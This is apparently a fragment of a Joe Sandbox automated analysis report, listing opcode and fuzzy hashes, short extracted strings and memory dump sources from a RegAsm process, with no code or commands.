                                • API String ID:
                                • Opcode ID: 05aea5c5528a8815e366a70487fbd6b1da5da23cd79f618b74be97776840085e
                                • Instruction ID: 59e9045e61a4339cbcc8affb18dd8cf370a740de784ccbb499961d530e000f13
                                • Opcode Fuzzy Hash: 05aea5c5528a8815e366a70487fbd6b1da5da23cd79f618b74be97776840085e
                                • Instruction Fuzzy Hash: 7C01A730B045105FCB51EA78E850B1E77E5EB86754F14487EE14ACB341EB61DC428392
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83cb7be342c88a8d7dfcfdb49ac0c48d5cb1ef2125fdfccb6e895b41d78dcc3b
                                • Instruction ID: 828669c29b06b82be74149f99a2d197bac8ed684933fbacff9ad2862e30ba883
                                • Opcode Fuzzy Hash: 83cb7be342c88a8d7dfcfdb49ac0c48d5cb1ef2125fdfccb6e895b41d78dcc3b
                                • Instruction Fuzzy Hash: B701A431B104241BDB64957EE41072BB2EBDBC9B10F24883AE11EC7344EEA6DC024395
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52784a32d1d426289ec2c91ffc101086f3bfee9eb989ba488a94aa544452889a
                                • Instruction ID: 3c558f66b2631877cb5643be4232edd52aa05b1941fb734d2335dc606df9302b
                                • Opcode Fuzzy Hash: 52784a32d1d426289ec2c91ffc101086f3bfee9eb989ba488a94aa544452889a
                                • Instruction Fuzzy Hash: AA01F731F141249FDB549A75E8516EDBBB2EB89354F14487AE440EB385DB219841C7C0
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 163ada1dd520c7edf4bf9ab017b67d66d125f7ce96f53d753bd6741b80229175
                                • Instruction ID: cf66980f8abb044fa83a78b3c082e4e1d57a65dcfd93fe69246b1446727077ab
                                • Opcode Fuzzy Hash: 163ada1dd520c7edf4bf9ab017b67d66d125f7ce96f53d753bd6741b80229175
                                • Instruction Fuzzy Hash: 0A013C35B104241BDB65D57DE455B2E67EBDBCAA20F14887AE20ACB340EFA5DC424389
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c27884d419be46af977d478ed7be07de72b89d6e08a2d79d07d779d2281e41fd
                                • Instruction ID: 206c670c9eab0c92805c24d5036ebc07584c1ea3b03cd11f8330f7ed69ed754a
                                • Opcode Fuzzy Hash: c27884d419be46af977d478ed7be07de72b89d6e08a2d79d07d779d2281e41fd
                                • Instruction Fuzzy Hash: 63014430B105145FDB54EA79E850B2E73E6EB89B54F50887AE10ACB344EA65DC424785
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: feab40120c1512d618a8c35e9f7a5efe97f695c5ac634a0e3289ef559c5809d1
                                • Instruction ID: d9c14bbff7a6cdb18dd0f3715a8aacd3205ee85c4f07965ffbd3e21df3c7b93e
                                • Opcode Fuzzy Hash: feab40120c1512d618a8c35e9f7a5efe97f695c5ac634a0e3289ef559c5809d1
                                • Instruction Fuzzy Hash: EC01C831F206289FDF589A79E841A9EB7B5F785354F00447EE901EB344DB31A94487C0
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03e6cc9edc6e6cc7ae18c132ae5e05b14c4d28cab321c562b5d26bed00fa0d5f
                                • Instruction ID: 5cc39850bc948e27b64f4c539598e8b93188ba3604ae2ce519cee45ca4b24e1e
                                • Opcode Fuzzy Hash: 03e6cc9edc6e6cc7ae18c132ae5e05b14c4d28cab321c562b5d26bed00fa0d5f
                                • Instruction Fuzzy Hash: A7F09271E696846FDF61CF7089613AE7BF99F42214F2888E6C089C7152E232CA029381
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-2222239885
                                • Opcode ID: 2bb23327b6862d3cdc7d3c564f70d51e0f92f1a03b762e966adc42c63f5c8051
                                • Instruction ID: 548ba9c61f3f8580055158a271e3572bf614e1d0e778141d1767cd36080e7c03
                                • Opcode Fuzzy Hash: 2bb23327b6862d3cdc7d3c564f70d51e0f92f1a03b762e966adc42c63f5c8051
                                • Instruction Fuzzy Hash: 57121C30E002198FDB68DF75C954A9DB7F2BF89704F2089A9D409AB3A5DB319D85CF81
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-3823777903
                                • Opcode ID: c6de9998bf119e453a849027eecfacb7b70fd8afb0c71dbf19ccd418206127cc
                                • Instruction ID: dab9afcd052c221627e3387e46494b65e87d38b0032a5e4155c170cee0662b43
                                • Opcode Fuzzy Hash: c6de9998bf119e453a849027eecfacb7b70fd8afb0c71dbf19ccd418206127cc
                                • Instruction Fuzzy Hash: F8918130E00209DFEB68DF64DA55B6E7BF2BF84305F108829E401AB3A5DB75AD45CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                • API String ID: 0-390881366
                                • Opcode ID: 87a88e7645b4959eb8686cc60385553fbbd3f5ab834758046d8e7a983422673d
                                • Instruction ID: 09761d6b9be99b5ab4e7a09936706fc48b49de92dd1cd53b3c99444e69f4470c
                                • Opcode Fuzzy Hash: 87a88e7645b4959eb8686cc60385553fbbd3f5ab834758046d8e7a983422673d
                                • Instruction Fuzzy Hash: 2EF16230B04208CFDB59EF64D554A6EB7F2BF84304F248569E4059B3A9DB31ED46CB50
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: d5acc85b6ac92510ac5a94c175b0d0c2edcb48fbc1f2fb4f3719a17b4f263c78
                                • Instruction ID: d509b764f987c54499505a7888c76ca756896dae182996565e99952027814390
                                • Opcode Fuzzy Hash: d5acc85b6ac92510ac5a94c175b0d0c2edcb48fbc1f2fb4f3719a17b4f263c78
                                • Instruction Fuzzy Hash: 49B13D30B102088FDB94DF69D58876EB7F6AF88304F248879E406AB355DB75DD86CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $^q$$^q$$^q$$^q
                                • API String ID: 0-2125118731
                                • Opcode ID: 3dce6d2c981324087f08469de21e1fb9a42c44b794ebfd2a13d78ad6002ef99e
                                • Instruction ID: 491a5b8e770b7d495c0977f3b76505028fb1ea6b304b468e6f43cdfef77abf19
                                • Opcode Fuzzy Hash: 3dce6d2c981324087f08469de21e1fb9a42c44b794ebfd2a13d78ad6002ef99e
                                • Instruction Fuzzy Hash: B751D430E102089FDF65DB64D884AAEB7F2EF89300F24896AE801DB355DB31EC45CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3561950671.0000000006170000.00000040.00000800.00020000.00000000.sdmp, Offset: 06170000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6170000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR^q$LR^q$$^q$$^q
                                • API String ID: 0-2454687669
                                • Opcode ID: be3b6ce012f0f44f0120a4a9e27ebe6349418b047214e0b3ac3bde8670e64caa
                                • Instruction ID: b8d71ce54361ede0b9921480cb7efcc0ef8a1fec3094a2e8f1e15d283c435c49
                                • Opcode Fuzzy Hash: be3b6ce012f0f44f0120a4a9e27ebe6349418b047214e0b3ac3bde8670e64caa
                                • Instruction Fuzzy Hash: DC51B130B006058FDB98EB68D944A6AB7F2FF88714F1489B9E4059F3A5DB31EC45CB91